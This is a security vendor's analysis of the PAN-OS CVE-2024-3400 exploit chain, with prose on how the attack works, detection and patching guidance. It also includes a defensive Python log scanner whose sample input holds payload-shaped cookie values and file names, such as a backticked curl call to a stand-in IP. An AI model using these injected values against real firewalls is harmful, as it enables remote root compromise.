Emerging Security Threats : Analysis of CVE-2024-3400

Published On : 2024-05-02

EXECUTIVE SUMMARY

This research report examines CVE-2024-3400, a critical command injection vulnerability in Palo Alto Networks PAN-OS that was exploited in the wild by the threat actor tracked as UTA0218. The actor chained two weaknesses, arbitrary file creation in the GlobalProtect web service and command injection in the device telemetry feature, into a two-stage attack that executes commands as root on vulnerable PAN-OS firewalls by sending specially crafted unauthenticated requests, and then deploys a backdoor on the compromised device. CISA subsequently added CVE-2024-3400 to its Known Exploited Vulnerabilities catalog. These developments underscore the pressing need for organizations to identify affected devices, patch them, and hunt for signs of compromise in order to safeguard their digital assets and infrastructure.

INTRODUCTION

The disclosure of a critical vulnerability in Palo Alto Networks PAN-OS software has exposed a significant security concern affecting a large number of devices. Our investigation identified 64,584 publicly accessible PAN-OS devices that may be susceptible to this flaw, underscoring the extensive reach and potential impact of the vulnerability across diverse networks and organizations. In this report, we detail the vulnerability, its implications, and the remediation measures needed to mitigate the associated risks effectively.

KEY TAKEAWAYS AND ACKNOWLEDGEMENTS

Key Takeaways:

  • Threat actor UTA0218 exploited the vulnerability by sending crafted, unauthenticated requests to the GlobalProtect web service, gaining root-level command execution on the firewall and then deploying a backdoor.
  • On April 12, 2024, CISA added CVE-2024-3400, a critical security vulnerability impacting Palo Alto Networks PAN-OS, to its Known Exploited Vulnerabilities catalog.
  • The active exploitation of this vulnerability by hackers poses a significant data breach risk, with reports indicating the sale of sensitive data on underground forums.
  • Immediate patching is essential to address the vulnerability. Beyond patching, organizations must also assess potential compromises and proactively monitor for any signs of data breaches.

Acknowledgements:
The CYFIRMA Research team acknowledges the security researchers who responsibly disclosed this vulnerability.

VULNERABILITY AT A GLANCE

Vulnerability Type: Command injection (CWE-77), reached through an arbitrary file creation flaw
CVE ID: CVE-2024-3400
CVSS Severity Score: 10.0 (Critical), CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Application: Palo Alto Networks PAN-OS with a GlobalProtect gateway or GlobalProtect portal configured
Impact: Unauthenticated remote code execution with root privileges on the firewall
Severity: Critical
Affected Versions: PAN-OS 11.1 (before 11.1.2-h3), PAN-OS 11.0 (before 11.0.4-h1), PAN-OS 10.2 (before 10.2.7-h8, 10.2.8-h3 and 10.2.9-h1)
Patch Available: Yes

DESCRIPTION

CVE-2024-3400 is a command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software that enables an unauthenticated remote attacker to execute arbitrary code with root privileges on affected firewall appliances. The attacker first abuses an arbitrary file creation flaw in the GlobalProtect web service to drop a file with a chosen name, then relies on the device telemetry feature, which embeds that file name in a shell command, to have the name executed as a command. Detection involves reviewing the device's local logs and file system for malformed session identifiers and unexpected files, and remediation consists of applying the vendor hotfixes and vendor-supplied mitigations to prevent further exploitation.

IMPACT

The impact of CVE-2024-3400 is severe: an unauthenticated attacker can execute arbitrary code with root privileges on Palo Alto Networks firewall appliances running affected PAN-OS versions. Because the firewall sits at the network edge and terminates VPN traffic, root access grants complete control over the device, enabling attackers to manipulate or intercept network traffic, exfiltrate configuration and other sensitive data, disrupt services, and pivot to further attacks inside the network. For affected organizations this translates into unauthorized access to critical infrastructure, compromise of sensitive information, and disruption of business operations.

AFFECTED VERSIONS

The following versions of PAN-OS are affected by CVE-2024-3400 as of April 16, 2024. Only firewalls with a GlobalProtect gateway or GlobalProtect portal configured are exposed; Cloud NGFW, Panorama appliances, and Prisma Access are not affected.

  • PAN-OS 11.1 (before 11.1.2-h3)
  • PAN-OS 11.0 (before 11.0.4-h1)
  • PAN-OS 10.2 (before 10.2.7-h8, before 10.2.8-h3, before 10.2.9-h1)

SECURITY INDICATORS

Is there already an exploit tool to attack this vulnerability?
Yes. Public proof-of-concept exploit code for CVE-2024-3400 is available, and attackers have built tooling around it to execute arbitrary code with root privileges on vulnerable Palo Alto Networks firewall appliances.

Has this vulnerability already been used in an attack?
Yes, CVE-2024-3400 has already been used in attacks. Security researchers have observed instances of in-the-wild exploitation of this vulnerability, with attackers leveraging it to gain unauthorized access and execute arbitrary code with root privileges on affected Palo Alto Networks firewall appliances. Additionally, there have been reports of backdoor malware being deployed in conjunction with this vulnerability to further compromise targeted systems and networks.

Are hackers discussing this vulnerability in the Deep/Dark Web?
Yes, with some actively sharing proof-of-concept (PoC) exploits and exchanging information on how to leverage this vulnerability for unauthorized access and privilege escalation. These discussions often involve sharing techniques, code snippets, and strategies for exploiting the vulnerability in different environments.

What is the attack complexity level?
Low. The vulnerability requires neither authentication nor user interaction and is exploitable remotely over the network (CVSS attack complexity: Low). The main practical constraint is timing: the injected command runs only when the device telemetry job next processes the planted file, so the attacker must wait for that job rather than receiving an immediate response to the request.

EXPLOIT AND ANALYSIS

The exploit chains two weaknesses in the GlobalProtect feature of Palo Alto Networks PAN-OS software, which together allow an unauthenticated attacker to execute arbitrary code with root privileges on the targeted firewall appliance. Comparing the patched gpsvc binary with the vulnerable one reveals a newly added function, main_isValidSessionId, whose purpose is to reject SESSID cookie values that are not well-formed UUIDs. Before the patch, gpsvc used the SESSID cookie value, unvalidated, to build the name of a per-session file under /tmp/sslvpn, so a cookie containing path traversal sequences let the attacker create a zero-byte, root-owned file with an arbitrary name in an arbitrary location on the file system. On its own this arbitrary file creation does not yield code execution, but it sets up the second stage.

The second stage abuses a command injection in the device telemetry feature, specifically the dt_send script that packages and transmits telemetry files. The script embeds the names of the files in the telemetry directory in a shell command without sanitizing them, so a file name containing shell metacharacters (for example, a command wrapped in backticks) is executed when the script runs. The attacker therefore crafts a SESSID cookie value that traverses into /opt/panlogs/tmp/device_telemetry/ and ends in a file name carrying the payload, and sends it in a single unauthenticated cURL request to the GlobalProtect web server.

Because device telemetry transmission runs periodically rather than on demand, the injected payload executes the next time the telemetry job processes the directory, at which point the attacker's command runs with root privileges. Only after this step can the attacker plant persistence on the device; the web shell and the statically linked SUID binary named root observed in /var/appweb/htdocs are post-exploitation artifacts written with that root access, not products of the file creation flaw itself, which only creates empty files.

To detect and respond to such attacks, review the device's local logs, in particular /var/log/nginx/sslvpn_access.log, /var/log/pan/sslvpn-access/sslvpn-access.log, /var/log/pan/device_telemetry_send.log and /var/log/pan/gpsvc.log, for requests whose SESSID cookie value is not a UUID or contains path traversal sequences or shell metacharacters. Additionally, vigilant monitoring for unexpected file creations in /tmp/sslvpn and /opt/panlogs/tmp/device_telemetry/ can identify the zero-byte files the first stage leaves behind. Remediation efforts should include applying the hotfixes for vulnerable PAN-OS versions and implementing vendor-supplied mitigations to prevent further exploitation of the identified vulnerabilities.
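The script below is an added example written for this report; it is not code from the original analysis or from Palo Alto Networks. It implements the two checks the preceding analysis points at: a UUID validator in the spirit of the main_isValidSessionId check that the patched gpsvc introduced, applied to the SESSID values that gpsvc records in /var/log/pan/gpsvc.log inside "failed to unmarshal session(...)" entries, and an allow-list filter for file names found under /opt/panlogs/tmp/device_telemetry/. The log lines and the directory listing are constructed sample input; the timestamp prefix of the gpsvc log line and the regular expressions are assumptions made for illustration, not the vendor's implementation.

```python
import re
import uuid

# A legitimate GlobalProtect SESSID is a UUID. The patched gpsvc added a check
# (main_isValidSessionId) that rejects anything else; the validator below is
# modelled on that purpose and is an assumption, not the vendor's code.
UUID_RE = re.compile(
    r"^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$"
)
TRAVERSAL_RE = re.compile(r"\.\./|/\.\.")
SHELL_META_RE = re.compile(r"[`$;|&<>(){}]")


def is_valid_session_id(sessid: str) -> bool:
    """Accept only a well-formed UUID; everything else is rejected before it
    could ever influence a file name."""
    if not UUID_RE.match(sessid):
        return False
    try:
        uuid.UUID(sessid)
    except ValueError:
        return False
    return True


def classify_sessid(sessid: str) -> list:
    """Return the reasons a SESSID value looks hostile (empty list = benign)."""
    reasons = []
    if TRAVERSAL_RE.search(sessid):
        reasons.append("path-traversal")
    if SHELL_META_RE.search(sessid):
        reasons.append("shell-metacharacters")
    if not is_valid_session_id(sessid):
        reasons.append("not-a-uuid")
    return reasons


# gpsvc records the rejected cookie inside "failed to unmarshal session(...)";
# the capture is greedy so a payload containing ')' is kept whole.
UNMARSHAL_RE = re.compile(r"failed to unmarshal session\((.*)\)\s*$")


def scan_gpsvc_log(text: str) -> list:
    """Return (line number, SESSID, reasons) for every suspicious entry."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = UNMARSHAL_RE.search(line)
        if not m:
            continue
        sessid = m.group(1)
        reasons = classify_sessid(sessid)
        if reasons:
            hits.append((lineno, sessid, reasons))
    return hits


# File names the first stage drops into the telemetry directory are later
# embedded in a shell command by dt_send, so anything outside a conservative
# allow-list deserves a look.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9._-]+$")


def flag_telemetry_filenames(names) -> list:
    """Return the file names that do not match the allow-list."""
    return [n for n in names if not SAFE_NAME_RE.match(n)]


# Constructed sample input (not real device output). The timestamp prefix is
# an assumption; only the "failed to unmarshal session(...)" text matters.
SAMPLE_GPSVC_LOG = """\
2024-04-12T10:00:01 gpsvc: failed to unmarshal session(2a0f5c1e-1234-4bcd-9abc-0123456789ab)
2024-04-12T10:00:07 gpsvc: failed to unmarshal session(../../../../opt/panlogs/tmp/device_telemetry/minute/x`curl 203.0.113.10`)
2024-04-12T10:01:15 gpsvc: failed to unmarshal session(./../../../../var/appweb/htdocs/probe.txt)
2024-04-12T10:02:44 gpsvc: failed to unmarshal session(f47ac10b-58cc-4372-a567-0e02b2c3d479)
"""

# Constructed directory listing standing in for /opt/panlogs/tmp/device_telemetry/minute/.
SAMPLE_TELEMETRY_NAMES = [
    "device_telemetry_minute_20240412.tgz",
    "x`curl 203.0.113.10`",
    "report;id",
]

if __name__ == "__main__":
    for lineno, sessid, reasons in scan_gpsvc_log(SAMPLE_GPSVC_LOG):
        print(f"line {lineno}: {sessid!r} -> {', '.join(reasons)}")
    print("suspicious telemetry files:",
          flag_telemetry_filenames(SAMPLE_TELEMETRY_NAMES))
```

Run against the constructed sample, the scanner flags lines 2 and 3 (the two cookies that are not UUIDs, one of them also carrying backticks) and leaves the two genuine UUIDs alone, while the allow-list filter singles out the two telemetry file names that contain shell metacharacters. On a real device the same logic can be pointed at the live gpsvc.log and a listing of the telemetry directory; a hit on a firewall that had an exposed GlobalProtect portal or gateway is a strong signal that the first stage of the chain was attempted.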

MITIGATION

To mitigate CVE-2024-3400 in Palo Alto Networks PAN-OS software, first upgrade to a fixed release: PAN-OS 11.1.2-h3, 11.0.4-h1, or 10.2.7-h8 / 10.2.8-h3 / 10.2.9-h1 (or later), as listed in the vendor advisory. Until the hotfix is applied, customers with a Threat Prevention subscription can block known attack traffic using the vendor-supplied threat signatures, and any GlobalProtect gateway or portal that is not necessary should be disabled to remove the exposed surface. Review device logs and the file system for malformed SESSID values, unexpected zero-byte files, and other signs of exploitation; applying the hotfix does not remove artifacts an attacker has already planted, so devices showing evidence of compromise require further remediation following the vendor's guidance. Restricting access to management interfaces and keeping software current remain sound general practices, but they are no substitute for the hotfix, since this flaw requires no credentials.

EXTERNAL THREAT LANDSCAPE MANAGEMENT

Target Geography:
Global organizations that rely on Palo Alto Networks PAN-OS software and run the affected versions are susceptible to this vulnerability, with the risk extending to regions such as the United States, Canada, Japan, China, India, the United Kingdom, France, Germany, Thailand and Brazil. The broad geographical spread underscores the universality of the threat: organizations anywhere face exploitation risk if they operate an affected PAN-OS firewall with GlobalProtect exposed to the Internet.

Target Industry:
The vulnerability presents a significant threat to organizations across sectors, particularly software companies and manufacturing, that rely heavily on Palo Alto Networks PAN-OS firewalls. Malicious actors may strategically target specific sectors based on the perceived value of the data or services behind those firewalls. Industries handling sensitive information or depending on PAN-OS GlobalProtect as their remote-access perimeter are at heightened risk of exploitation.

Target Technology:
The Palo Alto Networks PAN-OS software, specifically the GlobalProtect feature. GlobalProtect is a VPN feature used for remote access to enterprise networks. The vulnerability discussed (CVE-2024-3400) affects several recent versions of PAN-OS, including PAN-OS 11.1 (before 11.1.2-h3), PAN-OS 11.0 (before 11.0.4-h1), and PAN-OS 10.2 (before 10.2.7-h8, before 10.2.8-h3, before 10.2.9-h1). The exploit targets this technology to gain unauthorized access to the firewall appliances, allowing attackers to execute arbitrary code with root privileges.

UNDERGROUND AND DARK WEB FORUMS

In an underground forum, there’s active discourse revolving around exploiting a vulnerability found in Palo Alto Networks PAN-OS. Members are deliberating the prospect of selling exploits related to this vulnerability. Additionally, they’re dissecting the mechanics and potential ramifications of a proof-of-concept (PoC) associated with the exploit.

CONCLUSION

In conclusion, CVE-2024-3400 poses a significant risk to organizations using Palo Alto Networks PAN-OS software, as it allows unauthenticated attackers to execute arbitrary code with root privileges on affected firewalls. The exploitation of this vulnerability can lead to severe consequences, including unauthorized access, data breaches, and potentially widespread compromise of network security. It is crucial for affected organizations to apply the necessary patches provided by Palo Alto Networks promptly and implement additional security measures to mitigate the risk of exploitation. Proactive monitoring, regular software updates, and adherence to best security practices are essential to safeguard against such vulnerabilities in the future.